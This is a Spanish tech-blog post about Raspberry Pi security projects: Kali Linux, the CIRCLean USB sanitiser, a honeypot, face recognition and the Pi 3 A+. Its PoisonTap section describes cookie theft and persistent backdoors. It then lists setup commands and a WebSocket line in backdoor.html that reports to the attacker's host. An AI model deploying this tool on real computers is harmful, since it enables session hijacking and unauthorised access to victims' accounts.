Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Seguridad informática con Raspberry Pi




Las grandes ventajas de una Raspberry Pi como arquitectura hardware son: su reducido tamaño, su alta capacidad de proceso en relación a su tamaño y su escaso coste (a parte del bajo consumo). Estas son las características ideales para usar este hardware para utilidades seguridad informática. Veámos cómo una Raspberry Pi puede ayudarnos a aprender sobre seguridad online y proteger nuestros equipos. En anteriores entradas ya vimos que era posible hacer un completo análisis y auditoría de Redes Wifi con una Raspberry Pi. Otras posibles ideas son la instalación de utilidades de red como Nagios (monitoreo de Red) o Pi-Hole para bloquear y eliminar la publicidad de sitios webs mientras navegamos. O usar la  Raspberry Pi como centro multimedia utilizando  XBMC, OpenElec o Rasplex.




Kali Linux en la RaspBerry Pi

La popular distribución orientada a auditorías de seguridad Kali Linux tiene una versión desde hace años, ya que tiene soporte completo para la arquitectura ARM de 64 bits, una arquitectura que es la utilizada por los mini ordenadores más potentes que han ido apareciendo:

These images have a default password of “toor” and may have pre-generated SSH host keys.

username: root
password: toor

kali > startx


Para formatear la tarjeta SD podemos usar la herramienta SDFormatter. Después podemos utilizar Win32 Disk Imager, para escribir y convertir la imagen de una tarjeta SD a un pendrive USB. También podemos crear copias de seguridad del sistema operativo (clonar la imagen del SO)

Analizar memorias USB con CIRCleaner







Cuando necesitamos extraer la información de forma segura desde la llave USB sin enchufarla a ninguna computadora que podamos querer usar de nuevo. Necesitas una máquina "airlocked" (sin red) en caso de que intente contarle a alguien con armas de fuego. Una segunda computadora portátil no es práctica, Las máquinas virtuales requieren competencia para usarlas. Las máquinas virtuales exponen la computadora host a todo lo que esté conectado de todos modos.

Una imagen de sistema operativo segura diseñada para hacerlo de forma segura. Transferir con seguridad la información de una memoria USB potencialmente infectada a una memoria USB limpia y confiable sin transmitir malware ni alertar a nadie sobre la transferencia.

El malware con regularidad utiliza memorias USB para infectar a las víctimas, y el abuso de las memorias USB es un vector común de infección (como ejemplo, las llaves USB perdidas tienen un 66% de posibilidades de malware).

CIRCLean es una solución de hardware independiente para limpiar documentos de llaves USB / memorias USB no confiables. El dispositivo convierte automáticamente los documentos que no son de confianza en un formato legible pero desarmado y almacena estos archivos limpios en una llave / dispositivo USB de confianza (propiedad del usuario).

El objetivo de CIRCLean es establecer el intercambio de documentos incluso si no se puede confiar en la capa de transporte utilizada (la memoria USB) o si existe la sospecha de si los documentos contenidos están libres de malware o no. En el peor de los casos, solo se dañaría el CIRCLean, pero no la computadora que lee la llave / dispositivo USB de destino (de confianza).

El código se ejecuta en una Raspberry, lo que también significa que no es necesario conectar la llave USB original a una computadora. CIRCLean puede verse como una especie de espacio de aire entre la llave USB no confiable y su computadora operativa.

CIRCLean no requiere requisitos técnicos de ningún tipo y puede ser utilizado por cualquier persona. CIRCLean es un software gratuito que puede ser auditado y analizado por terceros.

PosionTap

PoisonTap es un gadget creado hace unos 2 años por el investigador de seguridad, Samy Kamkar, utilizando una RaspBerry Pi Zero y software Node.js

PoisonTap es capaz de emular una conexión Ethernet a través de USB (o Thunderbolt) que funciona de "gateway" para por ejemplo, poder capturar las cookies de las 1.000.000 webs más usadas, crear backdoors, o capturar sesiones, todo esto desde un servidor remoto.

Es capaz de infiltrarse en un equipo informático al tomar el control del puerto USB y emular una conexión Ethernet. Podría secuestrar todo el tráfico de Internet.

Además, PoisonTap es capaz de configurar una puerta trasera en el sistema que permite al ciberdelincuente retener el acceso incluso aunque la Raspberry Pi lleve un tiempo desconectada.

PoisonTap puede infiltrarse en cualquier computadora incluso cuando está bloqueada o protegida por contraseña.

Al tomar el poder del puerto USB, emula una conexión Ethernet a través de USB, antes de secuestrar todo el tráfico de Internet. Como si esto no fuera suficiente, PoisonTap configura una puerta trasera permanente en el sistema que permite al pirata informático retener el acceso mucho después de que la Pi esté desenchufada. Al insertar el código de ataque en un navegador abierto, PoisonTap secuestra más de un millón de sitios web, inserta falsos iframes y roba datos sobre cada solicitud web que el usuario realiza desde ese momento.

Es una pieza de software increíblemente desagradable de la que es difícil protegerse, y no es de extrañar que Samy se vincule a "puerto USB" en la descripción de su video.

Características de la herramienta:

  • Mediante la conexión USB, es capaz de emular una conexión Ethernet, ya mencionada anteriormente.
  • Captura todo el trafico de internet que tenga la maquina atacada. 
  • Captura y almacena todas las cookies HTTP de 1.000.000 de sitios web.
  • Expone el enrutador interno, lo que da la posibilidad al atacante de conectarse remotamente.
  • Instala backdoors persistentes en el cache HTTP para multitud de dominios, todo esto con acceso a las cookies del usuario mediante el envenenamiento de cache (cache poisoning).
  • Permite al atacante realizar peticiones HTTP remotamente con las cookies del usuario víctima en cualquier dominio con backdoor.
  • No requiere que la maquina esté desbloqueada.
  • Los backdoors y el acceso remoto persiste, incluso si el dispositivo de removido de la máquina víctima



$ sudo apt-get install nodejs
$ git clone https://github.com/samyk/poisontap
$ cd poisontap
$ sudo node backend_server.js &

Editar el fichero  poisontap/backdoor.html (cambiar la url de la línea var socket = new WebSocket(‘ws://:1337’);)

var socket = new WebSocket('ws://host:1337');

HoneyPot SNARE-TANNER


Un honeypot emula una vulnerabilidad real de programa o red (en un entorno controlado) para atraer un ataque/atacante externo. SNARE (honEypot Reactivo Avanzado de Súper Próxima Generación) y TANNER operan en conjunto para atraer y evaluar posibles intentos de piratería informática.

SNARE se ejecuta en cualquier sistema Linux, lo que lo hace perfecto para la Raspberry Pi. Una vez instalado, ingrese la URL del sitio que desea probar para hacer un clon. La ejecución de SNARE aloja una copia del sitio en la dirección IP de la Raspberry Pi y registra todas las solicitudes realizadas al sitio. TANNER es una herramienta para analizar los eventos, preparar diferentes respuestas y visualizar los datos a través de la GUI web.

Aprender cómo funciona una red y qué vigilar cuando algo va mal, es un paso importante hacia la creación de sistemas seguros.

Reconocimiento facial a través con OpenCV 


Este proyecto de Raspberry Pi es capaz de reconocer las caras de los usuarios. Necesita un módulo de cámara. Utiliza OpenCV (Open Source Computer Vision Library)

Otra opción es usar TensorFlow, una librería de reconocimiento de imágnes de Google, con la Raspberry Pi

Nueva Raspberry Pi 3 A+

Una versión más pequeña de la Pi 3.

Es de dominio público que la Fundación Raspberry no tiene intención de lanzar un modelo mucho más potente a largo plazo, así que con la Raspberry Pi 3 B+ ya en el mercado se daba por hecho que antes o después tenía que aparecer un modelo reducido.


La nueva Raspberry Pi 3 A+ es básicamente una versión recortada de la mejorada y ya conocida Raspberry Pi 3 B+, ideal para introducir en carcasas más pequeñas o ajustarla a proyectos donde el tamaño es un aspecto crítico. Sin embargo, retiene la mayor parte del hardware de su predecesor. Esto incluye un procesador ARM Cortex-A53 a 1,4 GHz y la conectividad 802.11ac/Bluetooth 4.2 con BLE.


Por el camino se caen el puerto Ethernet y tres de los puertos USB integrados en el modelo original, ahora reducidos a uno. También se reduce a la mitad la RAM, ofreciendo 512 MB.

  • A 1.4GHz 64-bit quad-core ARM Cortex-A53 CPU
  • 512MB LPDDR2 SDRAM
  • Dual-band 802.11ac wireless LAN and Bluetooth 4.2/BLE
  • Improved USB mass-storage booting
  • Improved thermal management


No estará disponible hasta el mes de diciembre, pero la Raspberry Pi 3 A+ ya se encuentra a la venta en los distribuidores oficiales de España por unos 28 euros.


Fuentes:
https://www.elotrolado.net/noticia_la-reducida-raspberry-pi-3-a-se-estrena-con-procesador-a-1-4-ghz-y-medidas-mas-compactas_38651
https://www.makeuseof.com/tag/raspberry-pi-learn-online-security/
https://www.redeszone.net/2018/11/18/raspberry-pi-herramientas-seguridad/

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.